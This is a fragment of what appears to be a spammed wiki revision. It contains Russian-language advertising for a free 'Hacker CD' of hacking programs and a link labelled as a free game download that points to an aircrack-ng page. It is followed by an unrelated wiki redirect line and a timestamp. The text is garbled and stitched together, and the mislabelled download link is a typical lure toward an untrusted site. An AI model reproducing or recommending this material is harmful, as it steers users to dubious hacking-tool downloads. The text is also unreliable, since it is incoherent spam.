поинтов, то это не зачтётся [http://funghidisora.com/aircrack-ng-win.php скачать бесплатно point blank с ботами] бесплатно Хакер CD - Самый полный сборник программ для взлома!<br><br>без регистрации и смс Этот материал по сути является учебным пособием для начинающего хакера и не только. На сегодня это самый полный сборник всего что имеется в сети по этой теме - учебные материалы, собрание статей и главное весь необходимый набор хакерских программ на все случаи жизни.
+
#REDIRECT [[/fa/ Sticky Home]]

Latest revision as of 21:50, 5 April 2015